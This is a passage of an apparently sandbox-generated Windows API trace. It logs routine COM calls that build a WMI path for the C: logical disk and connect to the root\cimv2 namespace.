[0210.915] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027500, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0210.915] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027500, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6030c50) returned 0x0 [0210.915] WbemDefPath:IUnknown:Release (This=0x6027500) returned 0x0 [0210.915] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6030c50) returned 0x0 [0210.915] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0210.916] WbemDefPath:IUnknown:AddRef (This=0x6030c50) returned 0x3 [0210.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0210.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0210.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66ccb38) returned 0x0 [0210.916] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccb38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0210.916] WbemDefPath:IUnknown:Release (This=0x66ccb38) returned 0x3 [0210.916] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0210.916] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0210.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0210.916] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x2 [0210.916] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x1 [0210.916] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0210.916] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0210.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6030c50) returned 0x0 [0210.916] WbemDefPath:IUnknown:AddRef (This=0x6030c50) returned 0x3 [0210.916] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x2 [0210.916] WbemDefPath:IWbemPath:SetText (This=0x6030c50, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0210.917] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0210.917] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0210.917] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0210.917] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030c50, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0210.917] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0210.917] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030c50, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0210.917] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030c50, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0210.917] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0210.917] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0210.917] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0210.917] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0210.917] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0210.917] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0210.917] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0210.919] IUnknown:Release (This=0xb51e34) returned 0x1 [0210.920] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x60274a0) returned 0x0 [0210.920] WbemDefPath:IUnknown:QueryInterface (in: This=0x60274a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0210.920] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60274a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6030be0) returned 0x0 [0210.920] WbemDefPath:IUnknown:Release (This=0x60274a0) returned 0x0 [0210.920] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6030be0) returned 0x0 [0210.920] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0210.920] WbemDefPath:IUnknown:AddRef (This=0x6030be0) returned 0x3 [0210.920] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0210.920] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0210.920] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66ccc18) returned 0x0 [0210.920] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccc18, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0210.920] WbemDefPath:IUnknown:Release (This=0x66ccc18) returned 0x3 [0210.920] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0210.921] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0210.921] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0210.921] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x2 [0210.921] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x1 [0210.921] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0210.921] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0210.921] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6030be0) returned 0x0 [0210.921] WbemDefPath:IUnknown:AddRef (This=0x6030be0) returned 0x3 [0210.921] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x2 [0210.921] WbemDefPath:IWbemPath:SetText (This=0x6030be0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0210.921] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030be0, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0210.921] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0210.921] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0210.921] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0210.921] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0210.921] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0210.921] IUnknown:Release (This=0xb51e34) returned 0x1 [0210.922] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x60248f0) returned 0x0 [0210.922] WbemLocator:IUnknown:QueryInterface (in: This=0x60248f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0210.922] WbemLocator:IClassFactory:CreateInstance (in: This=0x60248f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6027390) returned 0x0 [0210.922] WbemLocator:IUnknown:Release (This=0x60248f0) returned 0x0 [0210.922] WbemLocator:IUnknown:QueryInterface (in: This=0x6027390, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6027390) returned 0x0 [0210.923] WbemLocator:IUnknown:QueryInterface (in: This=0x6027390, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0210.923] WbemLocator:IUnknown:AddRef (This=0x6027390) returned 0x3 [0210.923] WbemLocator:IUnknown:QueryInterface (in: This=0x6027390, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0210.923] WbemLocator:IUnknown:QueryInterface (in: This=0x6027390, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0210.923] WbemLocator:IUnknown:QueryInterface (in: This=0x6027390, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0210.923] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0210.923] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0210.923] WbemLocator:IUnknown:QueryInterface (in: This=0x6027390, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0210.923] WbemLocator:IUnknown:Release (This=0x6027390) returned 0x2 [0210.923] WbemLocator:IUnknown:Release (This=0x6027390) returned 0x1 [0210.923] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0210.923] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0210.923] WbemLocator:IUnknown:QueryInterface (in: This=0x6027390, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6027390) returned 0x0 [0210.923] WbemLocator:IUnknown:AddRef (This=0x6027390) returned 0x3 [0210.923] WbemLocator:IUnknown:Release (This=0x6027390) returned 0x2 [0210.923] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030be0, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0210.923] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0210.923] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0210.924] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60273a0) returned 0x0 [0210.924] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60273a0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x603368c) returned 0x0 [0211.260] WbemLocator:IUnknown:QueryInterface (in: This=0x603368c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b9a4) returned 0x0 [0211.260] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b9a4, pProxy=0x603368c, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0211.260] WbemLocator:IUnknown:Release (This=0xb5b9a4) returned 0x1 [0211.260] WbemLocator:IUnknown:QueryInterface (in: This=0x603368c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b9c4) returned 0x0 [0211.260] WbemLocator:IUnknown:QueryInterface (in: This=0x603368c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b9a4) returned 0x0 [0211.260] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b9a4, pProxy=0x603368c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0211.260] WbemLocator:IUnknown:Release (This=0xb5b9a4) returned 0x2 [0211.260] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x1 [0211.260] CoTaskMemFree (pv=0xbd4a38) [0211.261] WbemLocator:IUnknown:Release (This=0x60273a0) returned 0x0 [0211.261] WbemLocator:IUnknown:QueryInterface (in: This=0x603368c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b9c4) returned 0x0 [0211.261] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0211.261] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0211.261] WbemLocator:IUnknown:AddRef (This=0xb5b9c4) returned 0x3 [0211.261] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0211.262] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0211.262] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5b924) returned 0x0 [0211.262] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b924, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0211.262] WbemLocator:IUnknown:Release (This=0xb5b924) returned 0x3 [0211.262] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0211.262] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0211.262] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b9ac) returned 0x0 [0211.262] WbemLocator:IRpcOptions:Query (in: This=0xb5b9ac, pPrx=0xb5b9c4, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0211.262] WbemLocator:IUnknown:Release (This=0xb5b9ac) returned 0x3 [0211.262] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x2 [0211.262] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0211.262] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0211.263] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x603368c) returned 0x0 [0211.263] 